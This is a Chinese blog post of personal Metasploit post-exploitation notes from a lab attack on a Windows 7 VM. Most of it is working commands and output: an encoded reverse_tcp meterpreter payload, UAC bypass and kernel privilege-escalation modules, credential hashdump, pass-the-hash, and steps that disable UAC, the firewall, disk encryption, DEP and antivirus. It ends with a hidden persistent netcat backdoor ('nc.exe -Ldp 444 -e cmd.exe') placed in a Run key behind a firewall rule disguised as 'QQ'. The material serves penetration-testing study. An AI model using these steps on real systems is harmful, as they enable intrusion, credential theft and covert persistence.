后渗透 | 测试阶段

获得一个较低权限的session

用msf生成一个payload

  • msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=192.168.171.129 LPORT=4444 -b "\00" -e x86/shikata_ga_nai -i 7 -f exe -o lao.exe
    • -i:编码次数
    • -b:排除坏字符

启动apache以便传输生成的lao.exe  

  • service apache2 start
  • mv lao.exe /var/www/html/
  • wind7下载保存

 

msf设置监听

  • use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • show options #不用设置都设置好了
  • exploit

wind7运行lao.exe

获得system权限

  • 直接getsystem会触发uac导致失败
meterpreter > getuid
Server username: WIN-R3NAMN78L7D\Wind7
meterpreter > getsystem 
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)

利用已经取得的session绕过UAC限制

  • local下的模块都是利用已取得的session再提权

wind7有询问框方式

  • use exploit/windows/local/ask  #每当要用到system权限的时候wind7都会跳出一个询问框
  • set payload windows/meterpreter/reverse_tcp
  • set FILENAME win_update.exe #设定这个执行程序的名字
  • set SESSION 1
  • exploit
msf5 exploit(windows/local/ask) > show options 

Module options (exploit/windows/local/ask):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   FILENAME   win_update.exe   no        File name on disk
   PATH                        no        Location on disk, %TEMP% used if not set
   SESSION    1                yes       The session to run this module on.
   TECHNIQUE  EXE              yes       Technique to use (Accepted: PSH, EXE)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.171.129  yes       The listen address (an interface may be specified)
   LPORT     8443             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows

  •  这里得到的session就是绕过uac的可以直接getsystem
msf5 exploit(windows/local/ask) > exploit 

[*] Started reverse TCP handler on 192.168.171.129:8443 
[*] UAC is Enabled, checking level...
[*] The user will be prompted, wait for them to click 'Ok'
[*] Uploading win_update.exe - 73802 bytes to the filesystem...
[*] Executing Command!
[*] Sending stage (176195 bytes) to 192.168.171.142
[*] Meterpreter session 2 opened (192.168.171.129:8443 -> 192.168.171.142:49163) at 2020-06-23 19:59:19 +0800

meterpreter > getuid
Server username: WIN-R3NAMN78L7D\Wind7
meterpreter > background 
[*] Backgrounding session 2...
msf5 exploit(windows/local/ask) > sessions 

Active sessions
===============

  Id  Name  Type                     Information                              Connection
  --  ----  ----                     -----------                              ----------
  1         meterpreter x86/windows  WIN-R3NAMN78L7D\Wind7 @ WIN-R3NAMN78L7D  192.168.171.129:4444 -> 192.168.171.142:49162 (192.168.171.142)
  2         meterpreter x86/windows  WIN-R3NAMN78L7D\Wind7 @ WIN-R3NAMN78L7D  192.168.171.129:8443 -> 192.168.171.142:49163 (192.168.171.142)

msf5 exploit(windows/local/ask) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getsystem 
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

wind7无反映:执行exe

  • use exploit/windows/local/bypassuac
  • set SESSION 1
  • set payload windows/meterpreter/reverse_tcp
  • exploit
  • 直接绕过uac,wind7不会有任何反映
msf5 exploit(windows/local/bypassuac) > exploit 

[*] Started reverse TCP handler on 192.168.171.129:8443 
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploaded the agent to the filesystem....
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (176195 bytes) to 192.168.171.142
[*] Meterpreter session 3 opened (192.168.171.129:8443 -> 192.168.171.142:49164) at 2020-06-23 20:09:03 +0800

meterpreter > getuid
Server username: WIN-R3NAMN78L7D\Wind7
meterpreter > getsystem 
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

wind7无反映:动态链接库注入

  • use exploit/windows/local/bypassuac_injection
  • set SESSION 1
  • set payload windows/meterpreter/reverse_tcp
  • set target 1
  • exploit

利用漏洞提权

适用条件:Windows 7 32位 SP0/SP1

  • use exploit/windows/local/ms13_053_schlamperei
  • set payload windows/meterpreter/reverse_tcp
  • set session 1
  • exploit
  • 直接就是system权限

适用条件:Windows 7 32位 SP0/SP1

  • use exploit/windows/local/ms13_081_track_popup_menu 
  • set payload windows/meterpreter/reverse_tcp
  • set session 1
  • exploit

适用条件:IE 8 - 11

  • use exploit/windows/local/ms13_097_ie_registry_symlink
  • set payload windows/meterpreter/reverse_tcp
  • set session 1
  • exploit

适用条件:Windows XP SP3, Windows 2003 SP1, and Windows 7 32位 SP1

  • use exploit/windows/local/ppr_flatten_rec
  • set payload windows/meterpreter/reverse_tcp
  • set session 1
  • exploit

图形化payload:vncinject

  • use exploit/windows/local/bypassuac
  • set payload windows/vncinject/reverse_tcp
  • show options
  • exploit
msf5 exploit(windows/local/bypassuac) > exploit 

[*] Started reverse TCP handler on 192.168.171.129:8443 
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploaded the agent to the filesystem....
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (401920 bytes) to 192.168.171.142
[*] Starting local TCP relay on 127.0.0.1:5900...
[*] Local TCP relay started.
[*] Launched vncviewer.
[*] Session 4 created in the background.
msf5 exploit(windows/local/bypassuac) > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "win-r3namn78l7d"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding
msf5 exploit(windows/local/bypassuac) >

  • 默认只能看不能改,想改:set ViewOnly no

 hashdump

获取所有的:用户账号:sid:加密哈希值

  • session -i 2 #进入到一个有system权限的session
  • ps
  • migrate 1272 # system 级别需要一个 64 的进程程序才可以运行相应的服务, migrate 到一个 64 位的程序。
  • hashdump
 1272  496   spoolsv.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1296  496   taskhost.exe       x64   1        WIN-R3NAMN78L7D\Wind7         C:\Windows\System32\taskhost.exe
 1348  496   svchost.exe        x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1380  496   dllhost.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dllhost.exe
 1440  2544  exyFQx.exe         x86   1        WIN-R3NAMN78L7D\Wind7         C:\Users\Wind7\AppData\Local\Temp\exyFQx.exe
 1548  496   VGAuthService.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
 1584  496   vmtoolsd.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1840  496   svchost.exe        x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 2044  616   WmiPrvSE.exe       x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\wbem\WmiPrvSE.exe
 2184  496   SearchIndexer.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\SearchIndexer.exe
 2660  1080  lao.exe            x86   1        WIN-R3NAMN78L7D\Wind7         C:\Users\Wind7\Desktop\lao.exe
 2848  1688  iYUZWP.exe         x86   1        WIN-R3NAMN78L7D\Wind7         C:\Users\Wind7\AppData\Local\Temp\iYUZWP.exe
 2860  1080  lao.exe            x86   1        WIN-R3NAMN78L7D\Wind7         C:\Users\Wind7\Desktop\lao.exe
 2960  496   svchost.exe        x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 2992  496   sppsvc.exe         x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\sppsvc.exe
 3032  496   svchost.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe

meterpreter > migrate 1272 
[*] Migrating from 2848 to 1272...
[*] Migration completed successfully.
meterpreter > hashdump 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Wind7:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter >

关闭UA认证

绕过ua只在当前的session有效

  • cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  • cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
  • shutdown /r /t 0

Psexec模块之Passthehash

关闭防火墙+关闭ua认证 ,不知道为什么我这里没成功 192.168.171.142:445 - Exploit failed: RubySMB::Error::UnexpectedStatusCode STATUS_USER_SESSION_DELETED

  • use exploit/windows/smb/psexec
  • set RHOSTS 192.168.171.142    #那台机子执行smb协议
  • set SMBUser Wind7                    #设置远程调用的账号
  • set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0     #填密码的哈希值
  • set payload windows/meterpreter/reverse_tcp
  • show options
  • exploit

获得system权限可以干的事

关闭windows防火墙

  • session -i 4
  • shell
  • netsh advfirewall set allprofiles state off

 

关闭自带服务defender:C:\Windows\system32>

 

  • 机子里没装defender,那Windows Audio做演示,名字要的是服务名而不是演示名
  • net stop AudioSrv

关闭磁盘加密:C:\Windows\system32>

  • manage-bde -off c:
  • manage-bde -status C:

关闭DEP:C:\Windows\system32>

  • bcdedit.exe /set {current} nx AlwaysOff

关闭杀毒软件

  • run killav
C:\Windows\system32>exit
exit
meterpreter > run killav

[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value [...]
[*] Killing Antivirus services on the target...
meterpreter >
  • run post/windows/manage/killav
meterpreter > run post/windows/manage/killav

[*] No target processes were found.
meterpreter >

远程桌面:没成功

  • run post/windows/manage/enable_rdp #开
  • run multi_console_command -rc /root/.msf4/loot/20200625084435_default_192.168.171.142_host.windows.cle_701238.txt  #关
  • run getgui -e   #开
  • run getgui -u lao -p lao  #添加一个远程桌面用户组的用户

查看远程桌面

  • screenshot
meterpreter > screenshot
Screenshot saved to: /root/OFMCLZEC.jpeg
meterpreter >
  • use espia
  • screengrab 
meterpreter > use espia 
Loading extension espia...Success.
meterpreter > screengrab 
Screenshot saved to: /root/OhpONTdG.jpeg
meterpreter >

Incognito

  • list tokens -U
  • impersonate. token lab\\administrator
  • 运行以上命令需要getsystem
  • 本地普通权限用户需先本地提权
    • use exploit/windows/local/ms10 015 kitrap0d
    • execute -f cmd.exe -i-t # -t :使用当前假冒token执行程序
    • shell

注册表

  • 注册表保存着windows几乎全部配置参数
    • 如果修改不当,可直接造成系统崩溃
    • 修改前完整备份注册表
    • 某些注册表的修改是不可逆的
  • 常见用途
    • 修改、增加启动项:windows的激活码在注册表里
    • 窃取存储于注册表中的机密信息:浏览器记住的账号密码保存在注册表里
    • 绕过文件型病毒查杀:保存在注册表里,随系统自启动,运行在内存里,不写回硬盘

用注册表添加NC后门

  • 前提:已经有一个 meterpreter 的shell
  • upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32    #如果上传失败说明要提权
meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
[*] uploading  : /usr/share/windows-binaries/nc.exe -> C:\windows\system32
[*] uploaded   : /usr/share/windows-binaries/nc.exe -> C:\windows\system32\nc.exe
meterpreter >
  • reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run      #枚举启动项,如果什么都没有记得提权后再看
msf5 exploit(windows/local/bypassuac) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > gets
getsid     getsystem  
meterpreter > getsystem 
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run

  Values (3):

    VMware VM3DService Process
    VMware User Process
    nc64

meterpreter >
  • reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'
    • -d : detach from console, stealth mode
    • -L  : listen harder, re-listen on socket close
    • -p port :local port number
    • 检验,wind+R,输入regedit,打开注册表编辑器。路径:HKEY_ LOCAL _MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

  • reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
Key: HKLM\software\microsoft\windows\currentversion\Run
Name: nc
Type: REG_SZ
Data: C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe
meterpreter >

cmd查看指定端口

  • netstat -nao | find "444"
C:\Users\Wind7>netstat -nao | find "444"
  TCP    192.168.171.146:49177  192.168.171.129:4444   ESTABLISHED     1448
  TCP    192.168.171.146:49178  192.168.171.129:4444   ESTABLISHED     760

C:\Users\Wind7>

打开防火墙

  • execute -f cmd -i -H
    • -i 命令提示符
    • -H 隐秘方式
  • netsh firewall show opmode   #查看当前防火墙状态
  • netsh firewall add portopening TCP 444 "QQ" ENABLE ALL
  • shutdown -r -t 0
  • nc 1.1.1.1 444

 

posted @ 2020-06-23 19:41  东坡肉肉君  阅读(420)  评论(0)    收藏  举报